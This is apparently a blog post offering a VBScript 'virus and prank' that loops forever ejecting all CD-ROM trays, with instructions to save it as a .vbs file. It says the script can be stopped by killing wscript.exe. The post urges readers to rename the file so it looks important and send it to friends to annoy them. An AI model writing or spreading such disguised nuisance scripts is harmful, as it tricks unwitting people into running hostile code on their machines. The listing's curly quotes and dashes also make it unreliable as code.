WARNING !!! DONT TRY AT THIS AT HOME
Well,its a virus and a prank! you can even modify it.
Copy the below code into notepad and save it as virus.vbs or anyname.vbs
Remember to select Save as Type: All Types
When saved, double click to open it and see the magic!!!
Set oWMP = CreateObject(“WMPlayer.OCX.7″ )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next ‘ cdrom
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next ‘ cdrom
loop
End If
Now if u want to disable this then go to Task Manager(Ctrl+Alt+Del), click on processes tab then find wscript.exe and end this process.
Rename it,so that it looks something important and then send it to all your friends to annoy them. Related Articles :
0 comments:
Post a Comment